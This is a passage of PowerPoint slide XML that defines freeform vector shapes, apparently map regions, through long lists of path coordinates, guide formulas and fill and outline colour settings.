                      <a:pt x="152" y="298"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="148" y="298"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="145" y="298"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="142" y="300"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="132" y="291"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="125" y="284"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="124" y="283"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="122" y="285"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="119" y="289"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="118" y="289"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="113" y="285"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="110" y="285"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="106" y="287"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="104" y="289"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="102" y="289"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="99" y="288"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="95" y="284"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="93" y="281"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="87" y="275"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="86" y="274"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="86" y="273"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="87" y="268"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="86" y="266"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="82" y="262"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="76" y="261"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="73" y="260"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="71" y="257"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="71" y="251"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="69" y="249"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="68" y="248"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="63" y="244"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="59" y="242"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="56" y="239"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="54" y="236"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="55" y="233"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="54" y="231"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="51" y="230"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="46" y="228"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="40" y="225"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="38" y="223"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="37" y="219"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="35" y="219"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="33" y="219"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="27" y="219"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="26" y="217"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="26" y="212"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="29" y="202"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="28" y="198"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="26" y="194"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16" y="182"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="17" y="179"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="17" y="176"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="173"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12" y="170"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="168"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="164"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="155"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="153"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="153"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="154"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="151"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="147"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="142"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="140"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="135"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="133"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="130"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="129"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="124"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="120"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="114"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="18" y="105"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="19" y="104"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="28" y="104"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="34" y="104"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="34" y="102"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="34" y="93"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="34" y="85"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="34" y="80"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="34" y="61"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="34" y="56"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="34" y="49"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="34" y="41"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="35" y="33"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="38" y="33"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="49" y="33"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="50" y="31"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="50" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="50" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="56" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="62" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="74" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="83" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="95" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="111" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="129" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="148" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="164" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="238" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="240" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="243" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="245" y="38"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="247" y="50"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="249" y="52"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="253" y="55"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="257" y="58"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="262" y="62"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="265" y="63"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="267" y="65"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="265" y="66"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="263" y="69"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="261" y="73"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="259" y="75"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="255" y="76"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="252" y="77"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="251" y="78"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="249" y="82"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="247" y="83"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="242" y="83"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="240" y="87"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="240" y="91"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="238" y="97"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="237" y="102"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="233" y="112"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="232" y="116"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="233" y="122"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="233" y="127"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="233" y="128"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="232" y="135"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="229" y="144"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="227" y="152"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="220" y="154"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="217" y="157"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="212" y="165"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="211" y="167"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="210" y="175"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="209" y="183"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="207" y="185"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="205" y="185"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="202" y="184"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="200" y="185"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="199" y="186"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="198" y="194"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="197" y="200"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="196" y="209"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="196" y="213"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="194" y="222"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="191" y="224"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="189" y="224"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="182" y="223"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="180" y="223"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="179" y="229"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="178" y="232"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="179" y="233"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="182" y="234"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="188" y="235"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="190" y="236"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="196" y="243"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="203" y="250"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="209" y="261"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="211" y="266"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="214" y="269"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="217" y="271"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="220" y="272"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="222" y="274"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="223" y="281"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="222" y="282"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="222" y="283"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="218" y="283"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="211" y="284"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="205" y="284"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="200" y="284"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="198" y="286"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="193" y="292"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:noFill/>
              <a:ln w="2" cap="rnd">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="36405" name="Freeform 137"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3354" y="2306"/>
                <a:ext cx="155" cy="158"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 37 w 155"/>
                  <a:gd name="T1" fmla="*/ 56 h 158"/>
                  <a:gd name="T2" fmla="*/ 41 w 155"/>
                  <a:gd name="T3" fmla="*/ 29 h 158"/>
                  <a:gd name="T4" fmla="*/ 40 w 155"/>
                  <a:gd name="T5" fmla="*/ 22 h 158"/>
                  <a:gd name="T6" fmla="*/ 44 w 155"/>
                  <a:gd name="T7" fmla="*/ 17 h 158"/>
                  <a:gd name="T8" fmla="*/ 54 w 155"/>
                  <a:gd name="T9" fmla="*/ 12 h 158"/>
                  <a:gd name="T10" fmla="*/ 60 w 155"/>
                  <a:gd name="T11" fmla="*/ 2 h 158"/>
                  <a:gd name="T12" fmla="*/ 64 w 155"/>
                  <a:gd name="T13" fmla="*/ 0 h 158"/>
                  <a:gd name="T14" fmla="*/ 69 w 155"/>
                  <a:gd name="T15" fmla="*/ 1 h 158"/>
                  <a:gd name="T16" fmla="*/ 77 w 155"/>
                  <a:gd name="T17" fmla="*/ 2 h 158"/>
                  <a:gd name="T18" fmla="*/ 81 w 155"/>
                  <a:gd name="T19" fmla="*/ 0 h 158"/>
                  <a:gd name="T20" fmla="*/ 86 w 155"/>
                  <a:gd name="T21" fmla="*/ 2 h 158"/>
                  <a:gd name="T22" fmla="*/ 86 w 155"/>
                  <a:gd name="T23" fmla="*/ 7 h 158"/>
                  <a:gd name="T24" fmla="*/ 90 w 155"/>
                  <a:gd name="T25" fmla="*/ 7 h 158"/>
                  <a:gd name="T26" fmla="*/ 96 w 155"/>
                  <a:gd name="T27" fmla="*/ 3 h 158"/>
                  <a:gd name="T28" fmla="*/ 105 w 155"/>
                  <a:gd name="T29" fmla="*/ 25 h 158"/>
                  <a:gd name="T30" fmla="*/ 111 w 155"/>
                  <a:gd name="T31" fmla="*/ 29 h 158"/>
                  <a:gd name="T32" fmla="*/ 115 w 155"/>
                  <a:gd name="T33" fmla="*/ 35 h 158"/>
                  <a:gd name="T34" fmla="*/ 118 w 155"/>
                  <a:gd name="T35" fmla="*/ 44 h 158"/>
                  <a:gd name="T36" fmla="*/ 108 w 155"/>
                  <a:gd name="T37" fmla="*/ 59 h 158"/>
                  <a:gd name="T38" fmla="*/ 107 w 155"/>
                  <a:gd name="T39" fmla="*/ 68 h 158"/>
                  <a:gd name="T40" fmla="*/ 117 w 155"/>
                  <a:gd name="T41" fmla="*/ 79 h 158"/>
                  <a:gd name="T42" fmla="*/ 117 w 155"/>
                  <a:gd name="T43" fmla="*/ 88 h 158"/>
                  <a:gd name="T44" fmla="*/ 123 w 155"/>
                  <a:gd name="T45" fmla="*/ 87 h 158"/>
                  <a:gd name="T46" fmla="*/ 135 w 155"/>
                  <a:gd name="T47" fmla="*/ 97 h 158"/>
                  <a:gd name="T48" fmla="*/ 143 w 155"/>
                  <a:gd name="T49" fmla="*/ 104 h 158"/>
                  <a:gd name="T50" fmla="*/ 143 w 155"/>
                  <a:gd name="T51" fmla="*/ 110 h 158"/>
                  <a:gd name="T52" fmla="*/ 141 w 155"/>
                  <a:gd name="T53" fmla="*/ 120 h 158"/>
                  <a:gd name="T54" fmla="*/ 146 w 155"/>
                  <a:gd name="T55" fmla="*/ 123 h 158"/>
                  <a:gd name="T56" fmla="*/ 148 w 155"/>
                  <a:gd name="T57" fmla="*/ 127 h 158"/>
                  <a:gd name="T58" fmla="*/ 148 w 155"/>
                  <a:gd name="T59" fmla="*/ 132 h 158"/>
                  <a:gd name="T60" fmla="*/ 155 w 155"/>
                  <a:gd name="T61" fmla="*/ 138 h 158"/>
                  <a:gd name="T62" fmla="*/ 155 w 155"/>
                  <a:gd name="T63" fmla="*/ 139 h 158"/>
                  <a:gd name="T64" fmla="*/ 147 w 155"/>
                  <a:gd name="T65" fmla="*/ 140 h 158"/>
                  <a:gd name="T66" fmla="*/ 145 w 155"/>
                  <a:gd name="T67" fmla="*/ 141 h 158"/>
                  <a:gd name="T68" fmla="*/ 133 w 155"/>
                  <a:gd name="T69" fmla="*/ 143 h 158"/>
                  <a:gd name="T70" fmla="*/ 127 w 155"/>
                  <a:gd name="T71" fmla="*/ 153 h 158"/>
                  <a:gd name="T72" fmla="*/ 94 w 155"/>
                  <a:gd name="T73" fmla="*/ 157 h 158"/>
                  <a:gd name="T74" fmla="*/ 77 w 155"/>
                  <a:gd name="T75" fmla="*/ 149 h 158"/>
                  <a:gd name="T76" fmla="*/ 76 w 155"/>
                  <a:gd name="T77" fmla="*/ 140 h 158"/>
                  <a:gd name="T78" fmla="*/ 76 w 155"/>
                  <a:gd name="T79" fmla="*/ 134 h 158"/>
                  <a:gd name="T80" fmla="*/ 68 w 155"/>
                  <a:gd name="T81" fmla="*/ 134 h 158"/>
                  <a:gd name="T82" fmla="*/ 63 w 155"/>
                  <a:gd name="T83" fmla="*/ 127 h 158"/>
                  <a:gd name="T84" fmla="*/ 38 w 155"/>
                  <a:gd name="T85" fmla="*/ 114 h 158"/>
                  <a:gd name="T86" fmla="*/ 18 w 155"/>
                  <a:gd name="T87" fmla="*/ 104 h 158"/>
                  <a:gd name="T88" fmla="*/ 9 w 155"/>
                  <a:gd name="T89" fmla="*/ 100 h 158"/>
                  <a:gd name="T90" fmla="*/ 6 w 155"/>
                  <a:gd name="T91" fmla="*/ 93 h 158"/>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55"/>
                  <a:gd name="T139" fmla="*/ 0 h 158"/>
                  <a:gd name="T140" fmla="*/ 155 w 155"/>
                  <a:gd name="T141" fmla="*/ 158 h 158"/>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55" h="158">
                    <a:moveTo>
                      <a:pt x="0" y="79"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="37" y="56"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="42" y="33"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="41" y="29"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="40" y="24"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="40" y="22"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="42" y="19"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="44" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="50" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="54" y="12"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="60" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="60" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="62" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="64" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="67" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="69" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="71" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="77" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="80" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="81" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="84" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="86" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="86" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="86" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="89" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="90" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="93" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="96" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="101" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="105" y="25"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="105" y="27"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="111" y="29"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="118" y="30"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="115" y="35"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="115" y="37"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="118" y="44"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="110" y="53"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="108" y="59"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="107" y="67"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="107" y="68"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="109" y="71"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="117" y="79"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="116" y="86"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="117" y="88"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="119" y="87"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="123" y="87"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="132" y="95"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="135" y="97"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="141" y="102"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="143" y="104"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="143" y="106"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="143" y="110"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="142" y="115"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="141" y="120"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="142" y="123"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="146" y="123"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="147" y="123"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="148" y="127"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="148" y="130"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="148" y="132"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="153" y="136"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="155" y="138"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="155" y="139"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="150" y="140"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="147" y="140"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="146" y="140"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="145" y="141"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="136" y="142"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="133" y="143"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="130" y="148"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="127" y="153"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="123" y="158"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="94" y="157"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="83" y="151"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="77" y="149"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="76" y="147"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="76" y="140"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="77" y="137"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="76" y="134"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="69" y="134"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="68" y="134"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="65" y="128"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="63" y="127"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="46" y="118"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="38" y="114"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="23" y="106"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="18" y="104"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="100"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="100"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="99"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="93"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="79"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:srgbClr val="96AFCF"/>
              </a:solidFill>
              <a:ln w="9525">
                <a:noFill/>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="36406" name="Freeform 138"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3354" y="2306"/>
                <a:ext cx="155" cy="158"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 37 w 155"/>
                  <a:gd name="T1" fmla="*/ 56 h 158"/>
                  <a:gd name="T2" fmla="*/ 41 w 155"/>
                  <a:gd name="T3" fmla="*/ 29 h 158"/>
                  <a:gd name="T4" fmla="*/ 40 w 155"/>
                  <a:gd name="T5" fmla="*/ 22 h 158"/>
                  <a:gd name="T6" fmla="*/ 44 w 155"/>
                  <a:gd name="T7" fmla="*/ 17 h 158"/>
                  <a:gd name="T8" fmla="*/ 54 w 155"/>
                  <a:gd name="T9" fmla="*/ 12 h 158"/>
                  <a:gd name="T10" fmla="*/ 60 w 155"/>
                  <a:gd name="T11" fmla="*/ 2 h 158"/>
                  <a:gd name="T12" fmla="*/ 64 w 155"/>
                  <a:gd name="T13" fmla="*/ 0 h 158"/>
                  <a:gd name="T14" fmla="*/ 69 w 155"/>
                  <a:gd name="T15" fmla="*/ 1 h 158"/>
                  <a:gd name="T16" fmla="*/ 77 w 155"/>
                  <a:gd name="T17" fmla="*/ 2 h 158"/>
                  <a:gd name="T18" fmla="*/ 81 w 155"/>
                  <a:gd name="T19" fmla="*/ 0 h 158"/>
                  <a:gd name="T20" fmla="*/ 86 w 155"/>
                  <a:gd name="T21" fmla="*/ 2 h 158"/>
                  <a:gd name="T22" fmla="*/ 86 w 155"/>
                  <a:gd name="T23" fmla="*/ 7 h 158"/>
